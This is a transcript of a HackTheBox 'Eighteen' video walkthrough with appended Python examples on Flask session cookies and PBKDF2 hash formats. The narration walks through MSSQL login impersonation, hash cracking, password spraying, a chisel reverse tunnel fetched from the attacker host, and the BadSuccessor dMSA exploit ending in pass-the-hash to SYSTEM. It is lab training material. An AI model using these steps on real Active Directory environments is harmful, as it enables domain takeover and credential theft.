HackTheBox - Eighteen

IppSec · Beginner ·🔧 Backend Engineering ·2mo ago

Key Takeaways

Demonstrates hacking techniques, including nmap, NetExec, and the MSSQL Priv module, to exploit vulnerabilities in a Flask application

Full Transcript

What's going on YouTube? This is IppSec and today we'll be doing Eighteen from HackTheBox, which starts off as an assumed breach scenario where we get credentials to Microsoft SQL. Once we log in, we discover we can impersonate another user that gives us access to read the users table of the web app, where we can dump and crack a password. However, we don't know what user that password goes to. So, we'll perform a RID brute force to generate a username list, then NetExec to spray the password. Once on the box, we discover it's running Windows 2025, and Googling around shows it may be vulnerable to BadSuccessor, which is an exploit I didn't know much about how it worked before solving the box. However, after solving it, I have a much better understanding. And while this is mostly patched, it still provides a pretty nice attack surface for other post-exploitation activities. So, with that being said, let's just jump in. As always, we're going to start off with an nmap. So, -sC for default scripts, -sV enumerate versions, -vv for double verbose. This gives us things like the TTL. -oA, output all formats, put it in the nmap directory and call it eighteen, and then the IP address of 10.129.18.41. This can take some time to run, so I've already run it. Looking at the results, we have just two ports open. The first one being HTTP on port 80, and its banner tells us it's a Microsoft IIS server. It's also giving us a redirect to eighteen.htb. So let's go ahead and add this to our hosts file. So we'll do sudo vi /etc/hosts and then we can add 10.10.11... oh nope, 10.129.18.41 eighteen.htb. There we go. And then the next port we have is Microsoft SQL on 1433. It is running Server 2022, and it doesn't look like we get much more information. We do have self-signed certificates, so we don't even get a host name there. But we do have this host name. And let's just do a curl -v. I think dash... I forget what gives me just a HEAD. I can just do eighteen.htb. Let's do less. I just want to look at the headers.
And did I get them back? Maybe the less was a bad idea. Let's just do curl. We get the page. This should give me the headers. I just want to kind of look at everything. We still see IIS. Nothing really interesting. That's pretty much what nmap had told us. So let's go ahead and take a look at the server. This is an assumed breach box, so we could also just go straight and look at Microsoft SQL Server because we do have a set of credentials. But I always, always, always like starting with web. So looking at this, we have a page, we have a Get Started. We can create an account. So I'm just going to do ippsec, ippsec, root@ippsec.rocks. We'll do a password of password, log in. So let's just do ippsec, password. And we can enter some information, expenses. What else do we have? There's an admin. We can't access the admin. We could try to see what type of server this is. This may be a Flask error message. Let's go to 0xdf's 404 pages. And we could test Flask a few ways. I'll show another one, even if this does come back with something. Where is Flask? So Flask likes starting with this... where was it? Did I pass it? This doctype HTML. So let's look at this source. This is definitely going to be a Flask 404 page. It matches identically. But let's say they had custom 404s. We could look at the cookie because it did let us log in. So, we definitely have a cookie. And this, if we look at it, let's just do echo -n. This to me looks like a Flask cookie. And when I say it looks like a Flask cookie, it's like a JWT with a lot of information, and the middle part is the small part. And then we got this. This just screams Flask to me. If it was a regular JWT, I'd imagine the first piece would be much smaller than the middle piece. So, we could use a tool like flask-unsign. So, we do flask-unsign, I think -d for decode, then -c for cookie. We can get all the information here.
On a box, I actually had trouble decoding this, because I think old, old versions of Flask just put this in base64. If we try to decode it, it says invalid input. It's probably going to be a padding issue because it does URL-safe base64, but that's just going to get rid of the error message. We don't see this data here. So, what happened? This is actually zlib'd. So, if I do... I'm going to say pigz, which is going to be like a command line thing to do a zlib inflate. I'll do -z for zlib, -d for decompress, and -c for standard out, I want to say. I'm going to put it like this. And then I'm going to go with this way to execute a command. And we get the same thing as flask-unsign. Right? So we just did a deflate on... I think actually, I think inflate on this. But it was zlib compressed. So that's why we don't see the output, because Flask does compress it. So that's how we can look at cookies. But really, we don't get that much information. We could try flask-unsign and brute forcing the signing key and maybe turning yourself into an admin, but at this point I'd rather just start looking at the SQL server. So, it did give us creds. So, I'm going to do nxc mssql and then I'm just going to do eighteen.htb because I don't remember the IP address, Kevin, and then we want to give it the password. So, I'm going to go ahead and grab this, paste it in, and we could also try logging in with Kevin on the website itself, right? This is saying login has failed. We came from an untrusted domain. Try local auth. So, let's do what the error message tells us to do. And let's see, we get a valid login. So, NetExec has a lot of scripts we could just run from here. I think -L is going to give us modules. There is a RID brute, which we'll do in a little bit. But I like the mssql_priv module. So if we had just run this, and we'll see exactly what output it gives us, we see Kevin can impersonate appdev.
So this is just hinting that we have impersonation on the database. So let's just go ahead and now switch to Impacket's mssqlclient, so we get a shell, or like a console, on this SQL server. So we can say Kevin, then we got to put the password back in, and then @eighteen.htb. Put this in quotes because we do have a special character here. But now we have Impacket's MSSQL shell. Now you could do the same exact thing here. We could say enum_db; that shows us all the databases. We could say enum_users. And... was it enum_impersonate? And we can see the same exact thing: Kevin can impersonate appdev. If we go back to this DB, if we say, what is it, like show tables, financial_planner? That's not it. Is it like SP? Oh, let's see. SELECT * FROM sys.tables. Oh, man. Is it like table name? It's been so long since I did Microsoft SQL stuff. Let's see. Table history. That didn't get me. Name. Maybe I want to do name. N name. That's not getting me exactly what I expected. I was hoping to be able to get information from this financial_planner table, but maybe we don't have access to it. So let's see: enum_db, enum_links, enum_logins, enum_users, sp_start_job. One thing we could also do, let's do sudo responder -I tun0 and then xp_dirtree to our IP, so 10 10 158, and we do get a Microsoft SQL service NTLMv2 hash. We could try cracking this. It doesn't crack to anything, so I'm not going to waste your time. But these are just things I would play with, right? If this did end with a dollar sign, that would mean it's like a machine account or group managed service account, a special account that has a randomly generated password. So I wouldn't try cracking it if it ended with a dollar sign, but in this case, I probably would. But I'm being lazy right now and not showing you. Let's see. Let's just try... I'm not running enable_xp_cmdshell because it says guest, but we could do this, right? We don't have permission. We can try xp_cmdshell whoami. Nothing.
So, let's just do execute. Well, let me do enum_impersonate again so I can see the results. So we can do execute as login. So we'll do EXECUTE AS LOGIN = 'appdev'. And this is going to be how we abuse this impersonation. So now we can see we went from Kevin to appdev. And now we have appdev@master. So now let's go ahead and do enum_db. We can see pretty much the same thing. Let's go with enable_xp_cmdshell. Same thing. Nothing's really working. If we do SELECT *... we did name from sys.tables. Same thing there. Let's see, MSSQL cheat sheet. I want to look at this table and I'm struggling. Here we go. This is what I normally refer to. Select version, current user, list users, password hashes, select name. These are still things. Select... I'm an idiot. Sometimes I have to USE financial_planner, and then now this SELECT name FROM sys.tables is going to work. Wow. I'm going to do SELECT * FROM users, and let's see, we have admin, admin@eighteen.htb, and we have this password hash. So let's go ahead and try to crack this hash. So let's kill that. I'm gonna go ssh kraken, which is a box on my local network. Gonna go into the hashcat directory. vi hashes/18.pbkdf2-sha256. Paste this hash in. And if we try running this, it's not going to recognize the format. We have to do a little bit of manipulation here. So, let's do /opt/wordlists/rockyou.txt. Let's see. Come on. Initialize the bridge and tell me it's not going to work. That's fine. There we go. Nothing matched. So, I'm going to run --example-hashes, right? And then let's grep pbkdf2. So, that's going to be SHA-256 AES. Let's see what we have. This is SHA-512, HMAC-SHA512. Wonder if we should just grep, because there is a lot of this. So, let's just do grep PBKDF and see if we have anything that looks good. This one stands out: PBKDF2-HMAC-SHA256. Let's go ahead and run --example-hashes and see exactly what this is. So, let's go less again. Search that. Go up.
And it says it is Django, which is a little bit odd. We know this is Flask, not Django, but I mean, the format kind of matches. So, let's just go ahead and try to match this. So, I'm going to go... let's go ls. Not that. vi hashes/18. Paste that in. And let's see, this is an underscore. Then we put a dollar for the separator. And this is going to be the iteration count. I'm guessing this is salt. And then this is data. And now the thing that stands out to me is the data in the example is base64. This looks like it's hex. So I'm going to guess that is an issue. But let's go ahead and test it real quick. So if we just run this... Whoops. Not that. Where is it? There we go. We'll run it again. Make sure that still errors. Yep. Does it match? So, let's go ahead and convert this hex over to base64. So, if we do echo -n | xxd -r -p... I'm going to give it another xxd. That did not do it. How do we convert this hex? Is it just -r -p? Oh, wait. That didn't work. There we go. So, it helps if I paste it the first time. But here we go. We have now converted this into hex. We can see here's the hex format. If I don't do the xxd, it just looks like junk, right? So let's go with base 6... not base 6, base64. base64 is what I want to do. And I'm just going to put an echo at the end so we can cleanly copy this. And then vi hashes/18. And we want to go where that zero is. Delete word. Paste. And let's try running it again. And hopefully it detects it. If not, we're making a weird mistake. But here we go. It's initializing the backend. Looks like everything is going. It detected it as Django. And let's see. Do we get a hit pretty quickly? See how long it says it's going to take. Has not recovered yet. And there we go. It has now successfully cracked. So, let's just do a --show. And we can see the password is iloveyou1. So, what does this password go to? We could now, I guess, log into this web app. So, if I go over into the app, log out. Let's go log in.
Type in admin, iloveyou1. We should now be the admin. We can go to admin features and we could play with this. It doesn't look like there's any input here. Like, we could spend a lot of time looking for an API, but there's no API here. This is pretty much a dead end. Well, it's not pretty much. It is a dead end, right? So, let's get out of hashcat and we can get out of this shell. I'm going to go back into my Microsoft SQL stuff. If we do the -h, there was this --rid-brute. So, let's brute force our RIDs from the Microsoft SQL Server. And we get a bunch of users. So, let's go ahead and copy these out. vi users.txt. Let's paste this. And then we can say cat users | awk print. That looks like the sixth field. Awesome. And now let's mv t to users.txt. And if we look at users now, we just have a list of usernames. I don't know if the domain is going to mess anything up or not, but we will find out. So let's do NetExec, -u users.txt, and then the password was iloveyou1, I want to say. I hope I got that right. Run it again. We can't log in because we're untrusted domain. We could again try... was it local user? What was it? --local-auth. See if we get anywhere here. Nothing works. And that kind of makes sense because these are not local accounts. They're domain accounts. And one thing that is somewhat annoying: on the default top 1,000 ports of nmap, what is it, 5985 and 5986, I want to say, is not on it, and that's going to be WinRM. We have to do HTTP. So we can see these ports are open, or 5985 is at least, which is WinRM. So, let's go ahead and change this over to the WinRM protocol. And we get Adam.Scott. So, let's go ahead and try evil-winrm -u Adam.Scott -p. I should be able to do eighteen.htb. I think I can do a DNS there. Did I typo it? I'm going to put the password in a quote. Let's see. Ping. Okay. evil-winrm. Let's see. -i IP. Don't know exactly what's going on there, but let's go ahead, get the IP. I'm going to use that.
Weird. I'm not exactly sure what's going on here. Let's do sudo wireshark -i tun0... I don't do tun adapters with Wireshark. Just run Wireshark. Let's see. This font, this font is small. Can I make this big? Hopefully, we're not in here long. Okay, awesome. So, we make this POST. I'm just wondering if we get to like a host name where it's trying to reach and that's why it failed. Doesn't look like it. Maybe we have to specify a domain. So, let's exit this. I'm going to do -d eighteen.htb. How do we do domain? Is it going to be like realm? Yeah. Do I have the password wrong or something? NXC. Let's just copy this. Oh, I have an exclamation point. That's probably it. Can get rid of this. There we go. Well, out of habit, I just always added a bang after the number one, I guess, in a password. But now we get on the box. We can do a dir here. Nothing in Documents. dir. I did two Ds. Let's go into Desktop. We get user.txt. So now I'd probably go and start digging into the web server itself, because, well, if I do whoami /priv, we can see I don't have SeImpersonate, but if we were able to get onto the web server, if this was like PHP, we drop a PHP script, we could shell the web server and then potentially this account has SeImpersonatePrivilege where we can use GodPotato or something like that to priv. This is Flask, so we can't really do that. If I do Get-Acl app.py, it doesn't look like we'd be able to write to this. We can just test it out real quick. Hopefully I don't crash the web server. Yeah, we can't write here. We could go and pull this file down and try to find a remote code execution vulnerability, but let's just look at the libraries it imports real quick. We do have an os. So if we do os.urandom, os., it's only using os for urandom. Like, it's not doing os.system or anything like that. So I don't know if there's going to be a quick web priv here. Could pull it down, look at Snyk, see what else it says.
But one thing I always like doing nowadays is looking at the Windows version. So we do Get-ItemProperty and then HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion. This is just generally how I do it. We can see the version here. This is going to be 26100.4349. This is Windows Server 2025 Datacenter. But if I go ahead, let's just close this out real quick. We don't need to save that, and go to Google. Here, site: is it support.microsoft.com. We can see this is the June 10th, 2025 build, because this minor version matches. So this has been last updated in June 2025. If it was before this, then I would try... what is it? Is it like remove MIC, partial... Impacket, or I think it's Impacket. It's either Impacket and ntlmrelayx. One of the things... look at my DarkZero video where we just covered this, but I would try this if the DC was missing this patch. And I guess I don't know it's a DC yet, but let's do... Whoops, not that. netstat. Is it -an? Windows. Lots of ports. Oh my god, that was a mistake. TCP, we have 389. So LDAP. There should be 3306 as well. Not 3306. 636. Yeah, there we go. That's going to be an LDAP port. 389's LDAP. So this is definitely most likely a DC. But one key thing is it's Windows Server 2025. I know if I Google Active Directory exploit 2025, this gets to BadSuccessor. Let's go. I wonder if I just Googled Windows exploit... Windows exploit 2025 server. Does this still... dMSA? So, this is going to be BadSuccessor as well. Looking at it, it's like, this is the first box we've done with Windows Server 2025. Did someone just install this because they wanted to showcase the latest version of Windows, or is there a specific exploit? And in this case it is going to be the BadSuccessor exploit, and we'll talk about this for a little bit. It is a relatively interesting exploit. I don't fully understand it; this box is what kind of taught me it.
Essentially the dMSA is going to be a delegated managed service account, and it's very similar to a group managed service account. Remember when I was talking about cracking Microsoft SQL servers? If it was a gMSA account, you'd see it look like this in Active Directory to indicate it's a special account, the main thing being the dollar sign at the end. But the dMSA is something that's new. It's so people can help getting migrated over to a better version of accounts. And one thing the dMSA does is it has this process. It's talking about the migration, but there we go: msDS-ManagedAccountPrecededByLink. So, it allows us a way to impersonate another account, essentially. So, we create this special managed service account, we point it at the account it's supposed to replace, and then this managed service account magically can impersonate that account and have all the same privileges. That is essentially what this exploit is doing. Now the downside, or what happens before this patch... I forget exactly what it is. One of these group memberships that... do we see it quickly? Let's see. Yeah, we can write who the preceded account is in Active Directory. So when we do that, we can just say we can impersonate anyone we want. The key thing being we'll have to have write access to an OU. I believe we could test that with like bloodyAD, BloodHound and things like that. Right here is the unexpected, and whenever you see PAC, that is the privilege attribute certificate, but in here we're just saying we can now impersonate users, essentially. It's relatively hard to explain, but essentially dMSA: we create an account, we say our account can impersonate any user we want because we have write access to a special attribute of that account. And then when we create a ticket, it will give us that impersonation privilege.
What was fixed is the write permission to that link, or maybe it wasn't the write; maybe you have to have write permission over the account that you're impersonating. They changed something. And also Akamai, however you pronounce it, does have a good article: BadSuccessor, Akamai. I would also read this because it's still an attack vector. It's not that high because you need write access to something else, but it's a good way to do like an alternative DCSync or alternative shadow credential, right? Because if we have GenericWrite over the object, then we can just tell that object, hey, this account is the dMSA to us, and when our dMSA and the target account match, that allows us to impersonate. So this is another way we can still impersonate another account in Active Directory. I don't see many people using it for this. They still use shadow credentials and things like that that depend on ADCS, but this is another pretty cool thing for Windows Server 2025. So, we'll probably still see this attack path become more popular as more people update to 2025 and set the domain functional level to 2025. A lot of places will have the latest version of Windows, but they never do the step where they update the Active Directory functional level. So, they wouldn't have the dMSA functionality because they never updated Active Directory. I still see places with Active Directory on 2019, 2016, like super old levels, just because there's not much reason to update AD, because most people don't take advantage of the latest AD things. But that's enough ranting. Let's go ahead and exploit this. Now, we could use tools like SharpSuccessor and Rubeus to do it all on this box, but I really hate running .NET things and just running Windows executables. So, what I'm going to do is I'm going to set up a tunnel back to me, and we're going to use NetExec to exploit this. So, let's go ahead and go here.
Let's do mkdir www. I'm going to go in here. Let's copy /opt/chisel... chisel, we want .exe. python3 -m http.server, and let's do a curl and my IP address. So http 10 10 105 158 8000 chisel.exe, and we'll write it to chisel.exe. While that goes, let's stand up the server. So ./chisel server, we'll do on port 8001, and then we want to allow reverse and SOCKS. Is it socks5? There we go. And then now let's execute chisel.exe client 10 10 15 80001 R:socks. Let's see. Okay. I saw this error message. I thought it wasn't connecting, but I also see it open. So awesome. So now if we do proxychains nc 127.0.0.1 445, can we talk to it? Let's do -zv. Yes, we can. It is open. So, let's go ahead and edit /etc/hosts. And I'm going to point this now to localhost. So, let's do 127.0.0.1. And I'm going to run proxychains again. So, let's do nxc smb -u, is it Adam.Scott, password iloveyou1. And I want to say it's LDAP, actually. SMB, list modules, and then let's just search. Up there, there is a badsuccessor module, so let's do -M badsuccessor, and it needs options. No options required. LDAP target. Oh, eighteen.htb. I never specified where LDAP was going. That was weird. I'm actually surprised that it still somewhat worked. Session is working. Okay, so we do see it looks like it is going to be vulnerable. We can write over this OU, and if we do options on this, there's going to be nothing. Now what I want to do is go to, not Impacket, NetExec's GitHub. Whenever there's something I want to do in NetExec that I think should be in NetExec, I always go to their GitHub, I go to issues, and then I search for it, and like nine times out of 10 it's in there and I just can't find it in the help, because I'm bad at searching for things. But other times you see it's supposed to be in there or it's going to be in there soon. It's just not yet. And here we have a PR that's going to enable it. We can see, let's see.
They give it the badsuccessor and then the target OU, and it does everything for us. So let's go ahead and install this fork. So if we go here, I have NetExec installed with uv. So I'm just going to do uv tool install, and then we just need to add the branch, which is feat, and this. So we go and add this. And now when I run the options, hopefully it will list what options are available. So we can do -o and the target OU. So, let's go ahead and look at this again because it gives us the OU. And let's see. Can I copy this quickly? I can. Awesome. It is thinking of running. My proxy still up? Yes, it is. There we go. So, let's go with -o TARGET_OU. And I'm not sure if I give it or not. Let's just give it Staff. Let's try this. I have two dashes. Let's see. This may fail. If it fails... that's not the failure I expected. Let's see. sudo ntpdate. We have to proxychains eighteen. Oh, this may not work. No eligible. Let's see. We have a shell in the box, right? We do. evil-winrm. Where's the username? Oh, it's Adam.Scott. iloveyou1. That's right. evil-winrm -i eighteen.htb, Adam.Scott, password iloveyou1. We could also potentially get the time out of the header. I think we have to do 2>&1 like that, because standard error... the header goes in standard error is what I'm trying to... Okay. Is it 10.129.18.41? There we go. So, we could get the header this way, or the time. It is 4:13 GMT. I wonder if we can just do a date with that. sudo date. Let's see. I am EDT, which is 4 hours minus. So maybe 9:13. Is it -s? Okay, we set the date. Run this again. Let's see. -4... -4... 1... let's see. There we go. You can include time zone. 12. I'm not sure what I'm thinking. Still a time. Wait, what? curl, grep date, print 2. Let's go ahead and grab that. Oh, I don't have to. So I can do sudo date -s. I don't think that's right. Oops. Let's just try this. Clock skew.
At some point, I probably should just manually convert the time, because automating this is proving to be a bit of a pain. I know I've done this before. Let's see. It did not like... it cut the year off? Or... no, that's right. I don't know what it's doing there. Let's grep date. I do. Is it -I for header? Let's get rid of the standard error. That looks better. We can pipe errors to /dev/null. Now, okay, let's do sed date space. Okay, we have this date. Now, so sudo date -s, please set the time right. We have to put that in quotes. That looks better. And we're still going to get the clock skew error. Watch. Come on. Please work. It's taking its time. We should definitely have the date set, unless maybe this just does not like... there we go. So that is a good command to set the date on your computer based upon a web server. But finally we have it. We have the DNS host name of this, which is what we created with the attack, and then this account has Administrator as the target. So this account can now impersonate the Administrator and it gives us the NTLM hash. So now if I do sudo psexec, is it -hashes administrator@127.0.0.1? We don't need sudo. We just want proxychains. There we go. We do whoami. We're NT AUTHORITY\SYSTEM. So, we can go to users\administrator\desktop and get root.txt. So, hope you guys enjoyed that. Take care and I will see you all next time.
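On the cookie decoding shown early in the video (flask-unsign, then pigz to inflate the zlib payload): the following is an added Python example, not code from the video or from the box, that rebuilds the itsdangerous URLSafeTimedSerializer layout Flask uses for its session cookie with only the standard library. It makes both halves of the point visible: anyone holding the cookie can read the session, because the payload is just base64 (optionally zlib-compressed, marked by a leading dot), while only the holder of the server's secret key can produce a signature that verifies. The secret key, session contents and timestamp are constructed for the demo.

```python
"""Decode and verify a Flask-style session cookie with only the standard library.

Added example, not code from the video. Layout followed (itsdangerous, as used
by Flask's session interface):

    [.]<base64url payload>.<base64url timestamp>.<base64url HMAC-SHA1>

A leading '.' marks a zlib-compressed payload, which is why a plain base64
decode of such a cookie looks like binary junk until it is inflated.
The secret key, session contents and timestamp below are constructed.
"""
import base64
import hashlib
import hmac
import json
import zlib

SALT = b"cookie-session"  # the fixed salt Flask passes to its session signer


def _b64e(raw: bytes) -> str:
    """URL-safe base64 without '=' padding, as itsdangerous emits it."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64d(text: str) -> bytes:
    """Restore the padding the cookie dropped, then decode."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _signature(secret_key: bytes, signed_value: bytes) -> str:
    """itsdangerous 'hmac' key derivation: HMAC(secret, salt) becomes the MAC key."""
    derived = hmac.new(secret_key, SALT, hashlib.sha1).digest()
    return _b64e(hmac.new(derived, signed_value, hashlib.sha1).digest())


def make_cookie(session: dict, secret_key: bytes, timestamp: int) -> str:
    """Produce a signed cookie the way Flask does; used here to build test input."""
    data = json.dumps(session, separators=(",", ":")).encode()
    compressed = zlib.compress(data)
    if len(compressed) < len(data) - 1:  # only compress when it actually helps
        payload = "." + _b64e(compressed)
    else:
        payload = _b64e(data)
    ts_bytes = timestamp.to_bytes((timestamp.bit_length() + 7) // 8, "big")
    signed = f"{payload}.{_b64e(ts_bytes)}"
    return f"{signed}.{_signature(secret_key, signed.encode())}"


def decode_cookie(cookie: str) -> dict:
    """Read the session WITHOUT the key: the payload is encoded and signed, not encrypted."""
    compressed = cookie.startswith(".")
    payload = cookie.lstrip(".").split(".")[0]
    raw = _b64d(payload)
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def verify_cookie(cookie: str, secret_key: bytes, max_age: int, now: int) -> str:
    """Server-side check: 'ok', 'bad-signature' or 'expired'. decode_cookie alone proves nothing."""
    signed, _, sig = cookie.rpartition(".")
    expected = _signature(secret_key, signed.encode())
    if not hmac.compare_digest(expected, sig):
        return "bad-signature"
    issued = int.from_bytes(_b64d(signed.rpartition(".")[2]), "big")
    if now - issued > max_age:
        return "expired"
    return "ok"


if __name__ == "__main__":
    KEY = b"constructed-demo-secret"  # constructed, not a real key
    NOW = 1_750_000_000
    small = {"user": "kevin"}
    big = {"user": "kevin", "roles": ["staff"] * 20}  # long enough to trigger compression
    for sess in (small, big):
        c = make_cookie(sess, KEY, NOW)
        print("compressed" if c.startswith(".") else "plain", decode_cookie(c))
        print(" verify:", verify_cookie(c, KEY, 3600, NOW + 60))
    forged = make_cookie({"user": "admin"}, b"guessed-key", NOW)
    print("forged cookie decodes to", decode_cookie(forged),
          "but verifies as", verify_cookie(forged, KEY, 3600, NOW + 60))
```

The defender-side lesson is in verify_cookie: the signature check uses hmac.compare_digest and runs before anything in the payload is trusted, and a key that is short or guessable is the only thing standing between "readable" and "forgeable", which is exactly what flask-unsign's brute-force mode tests for.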
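On the hash format step: the PBKDF2 hash read from the users table was in Werkzeug's layout (colon-separated method, then dollar-separated salt and hex digest) and had to be rewritten into Django's layout (underscore, dollar separators, base64 digest) before hashcat recognised it. The following added Python example, not code from the video or the box, parses the Werkzeug layout, verifies a password against it the way the application itself would, and converts between the two layouts in both directions to show they encode the same digest. The password, salt and iteration count are constructed, and the 600,000 default in iterations_meet_policy is an assumed policy threshold, not a value from the page.

```python
"""Verify a Werkzeug-style PBKDF2 password hash and rewrite it in Django's layout.

Added example, not code from the video. The two layouts are:

    Werkzeug: pbkdf2:sha256:<iterations>$<salt>$<hex digest>
    Django:   pbkdf2_sha256$<iterations>$<salt>$<base64 digest>

Same KDF, same inputs; only the separators and the digest encoding differ.
Password, salt and iteration count used below are constructed for the demo.
"""
import base64
import hashlib
import hmac
import secrets
import string

SALT_ALPHABET = string.ascii_letters + string.digits


def werkzeug_hash(password: str, iterations: int, salt: str = "") -> str:
    """Build a stored hash in Werkzeug's layout (random 16-char salt if none given)."""
    if not salt:
        salt = "".join(secrets.choice(SALT_ALPHABET) for _ in range(16))
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return f"pbkdf2:sha256:{iterations}${salt}${dk.hex()}"


def parse_werkzeug(stored: str) -> tuple:
    """Split 'pbkdf2:<algo>:<iters>$<salt>$<hex>' into (algo, iters, salt, digest bytes)."""
    method, salt, digest_hex = stored.split("$", 2)
    kind, algo, iters = method.split(":")
    if kind != "pbkdf2" or algo not in hashlib.algorithms_available:
        raise ValueError(f"unsupported method {method!r}")
    return algo, int(iters), salt, bytes.fromhex(digest_hex)


def verify_password(stored: str, password: str) -> bool:
    """Constant-time comparison of a candidate password against the stored hash."""
    algo, iters, salt, digest = parse_werkzeug(stored)
    candidate = hashlib.pbkdf2_hmac(algo, password.encode(), salt.encode(), iters)
    return hmac.compare_digest(candidate, digest)


def to_django(stored: str) -> str:
    """Same hash in Django's layout: underscore, '$' separators, base64 digest."""
    algo, iters, salt, digest = parse_werkzeug(stored)
    return f"pbkdf2_{algo}${iters}${salt}${base64.b64encode(digest).decode()}"


def from_django(stored: str) -> str:
    """Inverse conversion, so a Django-style hash can be checked with verify_password."""
    algo, iters, salt, digest_b64 = stored.split("$", 3)
    algo = algo[len("pbkdf2_"):]
    return f"pbkdf2:{algo}:{iters}${salt}${base64.b64decode(digest_b64).hex()}"


def iterations_meet_policy(stored: str, minimum: int = 600_000) -> bool:
    """Defender check: flag stored hashes whose work factor is below the chosen minimum (assumed)."""
    return parse_werkzeug(stored)[1] >= minimum


if __name__ == "__main__":
    # Low iteration count keeps the demo fast; it also trips the policy check on purpose.
    stored = werkzeug_hash("correct horse battery staple", 1000, salt="constructedsalt1")
    print("werkzeug:", stored)
    print("django:  ", to_django(stored))
    print("round trip ok:", from_django(to_django(stored)) == stored)
    print("verify right/wrong:", verify_password(stored, "correct horse battery staple"),
          verify_password(stored, "Correct horse battery staple"))
    print("meets 600k-iteration policy:", iterations_meet_policy(stored))
```

The conversion changes nothing about the work factor: a hash that cracks quickly in one layout cracks equally quickly in the other, which is why iterations_meet_policy looks at the iteration count rather than the encoding.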

Original Description

00:00 - Introduction
00:45 - Start of nmap
02:20 - Taking a look at the page, manually decoding the Flask Cookie
06:15 - Running NetExec with MSSQL Priv module which lets us know we can impersonate, switching to mssqlclient
09:30 - Impersonating appdev, which can read the financial_planner table
12:25 - Converting the PBKDF2 hash to the Django format so we can try to crack it
16:20 - Using NXC to run RID BRUTE through MSSQL and get other users to spray the password with
20:50 - Using Evil-WinRM to access the box as Adam.Scott then poke at the webserver files, nothing here
22:45 - Getting the Windows Patch Level, noticing windows 2025 and searching exploits to find BadSuccessor
30:00 - Setting up Chisel so we can tunnel back to our box to run the badsuccessor module with nxc
32:50 - Looking at NXC Issues to see the support for BadSuccessor is still a PR, installing the special branch with uv
39:15 - Setting our system time to the time on the webserver based upon the Date Header from Curl
40:15 - Running BadSuccessor getting the NTLM hash of administrator and using psexec to get on the box